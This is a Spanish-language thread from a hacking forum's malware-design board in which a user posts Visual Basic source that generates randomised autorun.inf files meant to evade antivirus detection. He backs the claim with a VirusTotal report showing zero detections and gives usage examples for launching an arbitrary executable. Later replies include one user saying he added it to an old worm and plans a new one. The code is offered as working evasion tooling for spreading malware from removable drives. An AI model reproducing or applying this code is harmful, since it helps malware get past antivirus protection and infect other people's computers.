elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Guía actualizada para evitar que un ransomware ataque tu empresa


+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Análisis y Diseño de Malware (Moderador: fary)
| | |-+  [Src] Autorun.inf FUD (Pensaste que ya no servia LOL)
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] 2 Ir Abajo Respuesta Imprimir
Autor Tema: [Src] Autorun.inf FUD (Pensaste que ya no servia LOL)  (Leído 8,611 veces)
BlackZeroX
Wiki

Desconectado Desconectado

Mensajes: 3.158


I'Love...!¡.


Ver Perfil WWW
[Src] Autorun.inf FUD (Pensaste que ya no servia LOL)
« en: 27 Mayo 2010, 09:29 am »

Bueno hace mucho que me la sabia como hacer un Autorun.Inf FUD solo que como ya abandono las malas practicas empesare a liberar algunos codigos sencillos pero utiles para algunos:

Este es un codigo para generar un archivo Autorun.inf 100% FUD indetectable ante AVIRA Norton, ... bueno ante cualquier AV... hasta la fecha sigue intacto xP.

OJO LOS AUTORU.INF SIEMPRE son DIFERENTES!¡.

Código
  1.  
  2. '
  3. ' ////////////////////////////////////////////////////////////////
  4. ' // Autor: BlackZeroX ( Ortega Avila Miguel Angel )            //
  5. ' //                                                            //
  6. ' // Web: http://InfrAngeluX.Sytes.Net/                         //
  7. ' //                                                            //
  8. ' // |-> Pueden Distribuir Este Codigo siempre y cuando         //
  9. ' // no se eliminen los creditos originales de este codigo      //
  10. ' // No importando que sea modificado/editado o engrandesido    //
  11. ' // o achicado, si es en base a este codigo                    //
  12. ' ////////////////////////////////////////////////////////////////
  13.  
  14. option explicit
  15.  
  16. Public Function GenerarAutorun(StrPath As String, StrExeNameExt As String) As Long
  17. Dim Var(6)                                      As String
  18. Dim DataWrite                                   As String
  19. Dim i                                           As Integer
  20. Dim RN                                          As Integer
  21. Dim nMin                                        As Long
  22. Dim nMax                                        As Long
  23. Dim Sep                                         As String
  24. Dim Char1                                       As String * 1
  25. Dim Char2                                       As String * 1
  26.    Var(0) = "[Autorun]"
  27.    Var(1) = "Open = " & StrExeNameExt
  28.    Var(2) = "UseAutoPlay = 1"
  29.    Var(3) = "action = @" & StrExeNameExt
  30.    Var(4) = "shell\open\Command = " & StrExeNameExt
  31.    Var(5) = "shell\open\Default = 1"
  32.    Var(6) = "shell\explore\Command = " & StrExeNameExt
  33.    If Dir(StrPath, vbDirectory) <> "" Then
  34.        Call NormalizePath(StrPath)
  35.        StrPath = StrPath & "autorun.inf"
  36.        Open StrPath For Binary As 1
  37.            For i = 0 To 6
  38.                DataWrite = vbCrLf & Var(i)
  39.                nMin = NumeroAleatorio(100, 1000)
  40.                nMax = nMin + NumeroAleatorio(100, 1000)
  41.                For RN = 0 To NumeroAleatorio(nMin, nMax)
  42.                    Char1 = Chr(NumeroAleatorio(50, 255))
  43.                    Char2 = Chr(NumeroAleatorio(50, 255))
  44.                    Sep = Chr$(NumeroAleatorio(1, 255))
  45.                    While Sep = Char1 Or Sep = Char2: DoEvents
  46.                        Sep = Chr$(NumeroAleatorio(1, 255))
  47.                    Wend
  48.                    DataWrite = DataWrite & vbCrLf & ";" & TextoAleatorio(Char1 & Sep & Char2, Sep, 1)
  49.                Next RN
  50.                Put 1, , DataWrite
  51.            Next i
  52.        Close 1
  53.        GenerarAutorun = 1
  54.    End If
  55. ErrorFatal:
  56. End Function
  57. Private Sub NormalizePath(ByRef sData As String)
  58.    sData = IIf(Right$(sData, 1) = "\", sData, sData & "\")
  59. End Sub
  60. Function TextoAleatorio(StrRango As String, Separador As String, Optional LENTEXTMIN As Long = 1, Optional LENTEXTMAX As Long = -1) As String
  61. Dim spli()                                      As String
  62. Dim i                                           As Double
  63.    If InStr(StrRango, Separador) > 0 Then
  64.        spli = Split(StrRango, Separador)
  65.        LENTEXTMAX = LENTEXTMIN + Int(IIf(LENTEXTMAX = -1, NumeroAleatorio(1, 100), LENTEXTMAX))
  66.        For i = LENTEXTMIN To LENTEXTMAX
  67.            TextoAleatorio = TextoAleatorio & Chr(NumeroAleatorio(Asc(spli(0)), Asc(spli(1))))
  68.        Next i
  69.    End If
  70. End Function
  71. Public Function NumeroAleatorio(MinNum As Long, MaxNum As Long) As Long
  72. Dim Tmp                                 As Long
  73.    If MaxNum < MinNum Then: Tmp = MaxNum: MaxNum = MinNum: MinNum = Tmp
  74.    Randomize: NumeroAleatorio = CLng((MinNum - MaxNum + 1) * Rnd + MaxNum)
  75. End Function
  76.  
  77.  

la Llamada se realiza en alguna parte de su Codigo fuente de la siguiente manera:


Código
  1.  
  2. Call GenerarAutorun("c:\", "Ejecuta.exe")
  3.  
  4.  

Donde C:\ es la RUTA donde se guardara el archivo Autorun.inf y donde Ejecuta.exe es el archivo en el mismo directorio a ejecutar con el metodo Autorun.Inf

ahora si se quiere ejecutar el exe de un subdirectorio con el respoecto a donde se encuentra el Autorun.inf actual solo hay que hacerlo de la siguiente forma:

Código
  1.  
  2. Call GenerarAutorun("c:\", "Carpeta\SubCarpeta2\Ejecuta.exe")
  3.  
  4.  

Sangriento Infierno Lunar!¡.
« Última modificación: 6 Julio 2010, 08:27 am por BlackZeroX▓▓▒▒░░ » En línea

The Dark Shadow is my passion.
Psyke1
Wiki

Desconectado Desconectado

Mensajes: 1.089



Ver Perfil WWW
Re: [SRC] AUTORUN.Inf FUD
« Respuesta #1 en: 27 Mayo 2010, 09:34 am »

Impresionante!!!!!!!!!! :o
Que casualidad que estaba trabajando justo algo similar!!!!!!!!!!
Despues le echo un vistazo y si no entiendo pregunto ;-)

Salu2! ;D
« Última modificación: 27 Mayo 2010, 09:46 am por *PsYkE1* » En línea

BlackZeroX
Wiki

Desconectado Desconectado

Mensajes: 3.158


I'Love...!¡.


Ver Perfil WWW
Re: [SRC] AUTORUN.Inf FUD
« Respuesta #2 en: 27 Mayo 2010, 09:39 am »


}reporte desde VirusTotal... Ojo como no detecta nada y desde hace 2 años no lo ha hecho ningun AV sigue y debera seguir FUD

Código:
Análisis del archivo autorun.inf recibido el 2010.05.27 07:37:26 (UTC)
Motor antivirus Versión Última actualización Resultado
a-squared 4.5.0.50 2010.05.10 -
AhnLab-V3 2010.05.27.00 2010.05.27 -
AntiVir 8.2.1.242 2010.05.26 -
Antiy-AVL 2.0.3.7 2010.05.26 -
Authentium 5.2.0.5 2010.05.27 -
Avast 4.8.1351.0 2010.05.27 -
Avast5 5.0.332.0 2010.05.27 -
AVG 9.0.0.787 2010.05.27 -
BitDefender 7.2 2010.05.27 -
CAT-QuickHeal 10.00 2010.05.27 -
ClamAV 0.96.0.3-git 2010.05.27 -
Comodo 4942 2010.05.25 -
DrWeb 5.0.2.03300 2010.05.27 -
eSafe 7.0.17.0 2010.05.26 -
eTrust-Vet 35.2.7513 2010.05.27 -
F-Prot 4.6.0.103 2010.05.26 -
F-Secure 9.0.15370.0 2010.05.27 -
Fortinet 4.1.133.0 2010.05.26 -
GData 21 2010.05.27 -
Ikarus T3.1.1.84.0 2010.05.27 -
Jiangmin 13.0.900 2010.05.24 -
Kaspersky 7.0.0.125 2010.05.27 -
McAfee 5.400.0.1158 2010.05.27 -
McAfee-GW-Edition 2010.1 2010.05.27 -
Microsoft 1.5802 2010.05.27 -
NOD32 5148 2010.05.26 -
Norman 6.04.12 2010.05.26 -
nProtect 2010-05-26.01 2010.05.26 -
Panda 10.0.2.7 2010.05.26 -
PCTools 7.0.3.5 2010.05.27 -
Prevx 3.0 2010.05.27 -
Rising 22.49.03.01 2010.05.27 -
Sophos 4.53.0 2010.05.27 -
Sunbelt 6362 2010.05.27 -
Symantec 20101.1.0.89 2010.05.27 -
TheHacker 6.5.2.0.287 2010.05.25 -
TrendMicro 9.120.0.1004 2010.05.27 -
TrendMicro-HouseCall 9.120.0.1004 2010.05.27 -
VBA32 3.12.12.5 2010.05.26 -
ViRobot 2010.5.20.2326 2010.05.27 -
VirusBuster 5.0.27.0 2010.05.26


Dulce Infierno Lunar!¡.
En línea

The Dark Shadow is my passion.
Psyke1
Wiki

Desconectado Desconectado

Mensajes: 1.089



Ver Perfil WWW
Re: [SRC] AUTORUN.Inf FUD
« Respuesta #3 en: 27 Mayo 2010, 09:47 am »

ALA :o
Pense que despues del Conflicker esto era mas detectado... :silbar:

Salu2! ;)
En línea

BlackZeroX
Wiki

Desconectado Desconectado

Mensajes: 3.158


I'Love...!¡.


Ver Perfil WWW
Re: [Src] Autorun.inf FUD (Pensaste que ya no servia LOL)
« Respuesta #4 en: 27 Mayo 2010, 09:53 am »

ALA :o
Pense que despues del Conflicker esto era mas detectado... :silbar:

Salu2! ;)

Mi codigo genera archivos autorun.inf de forma distinta SIEMPRE puedes cambiar los rango dentro del fuente si hay dudas avisar que explico las lines si es nesesario.

P.D.: Ya tiene 3 años que uso este metodo y hasta ahora no me lo a detectado ningun AV xP, y el reporte de Virus Total sigue en 0/41 LOL.

Dulce Infierno Lunar!¡,
En línea

The Dark Shadow is my passion.
Psyke1
Wiki

Desconectado Desconectado

Mensajes: 1.089



Ver Perfil WWW
Re: [Src] Autorun.inf FUD (Pensaste que ya no servia LOL)
« Respuesta #5 en: 27 Mayo 2010, 09:56 am »

Ya, ya vi que era de forma aleatoria... :P
Yo pensaba hacer algo asi, pero no lo tenia tan claro... :xD

Salu2!
En línea

Karcrack


Desconectado Desconectado

Mensajes: 2.416


Se siente observado ¬¬'


Ver Perfil
Re: [Src] Autorun.inf FUD (Pensaste que ya no servia LOL)
« Respuesta #6 en: 27 Mayo 2010, 16:07 pm »

Podrias pegar un ejemplo de Autorun generado :P :P
En línea

BlackZeroX
Wiki

Desconectado Desconectado

Mensajes: 3.158


I'Love...!¡.


Ver Perfil WWW
Re: [Src] Autorun.inf FUD (Pensaste que ya no servia LOL)
« Respuesta #7 en: 27 Mayo 2010, 20:12 pm »


Haber para que entiendan el codigo de forma rapida y precisa:

las variables o registros de un autorun.inf no se cifran ojo:
en un autorun.inf se le pueden adicionar lineas de comentarios (Esto no es nuevo).

* El codigo que pongo aqui lo que hace es meter lineas de comentarios Aleatroias.
* Los registros del autorun.inf siguen intactos (Si abren el archivo resultante y usan buscar y buscan [autorun], u otra linea las encontraran).
* Las longitudes de los textos como comentarios son aleatorios al igual que los que existen ente los registros del arhivo autorun.inf.
* El archivo resultante no pesa 1 o 3 kb pesa mas de 100kb por lo menos puede pesar tanto se desee!¡, pero el optimo para mi fue este que esta entre 200kb y 380kb.

Dulce Infierno Lunar!¡.
En línea

The Dark Shadow is my passion.
Karcrack


Desconectado Desconectado

Mensajes: 2.416


Se siente observado ¬¬'


Ver Perfil
Re: [Src] Autorun.inf FUD (Pensaste que ya no servia LOL)
« Respuesta #8 en: 27 Mayo 2010, 22:09 pm »

Eso esta clarisimo, solo digo que un ejemplo lo dejaria clarisimo!! :xD
En línea

n3fisto

Desconectado Desconectado

Mensajes: 153


Ver Perfil
Re: [Src] Autorun.inf FUD (Pensaste que ya no servia LOL)
« Respuesta #9 en: 15 Junio 2010, 11:13 am »

Bueno no se si se acuerdan de la aplicacion TRIBANT del gusanito que fue sacado ya hace bastante tiempo, pues lo que hice fue añadirle la parte de codigo que indico, y wala no lo detecto el autorun.inf el avast 5.0 lo malo que al tribant si lo detectaron, estoy pensando hacer uso de reingenieria y poder crear el primer gusano homero
En línea

Páginas: [1] 2 Ir Arriba Respuesta Imprimir 

Ir a:  
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines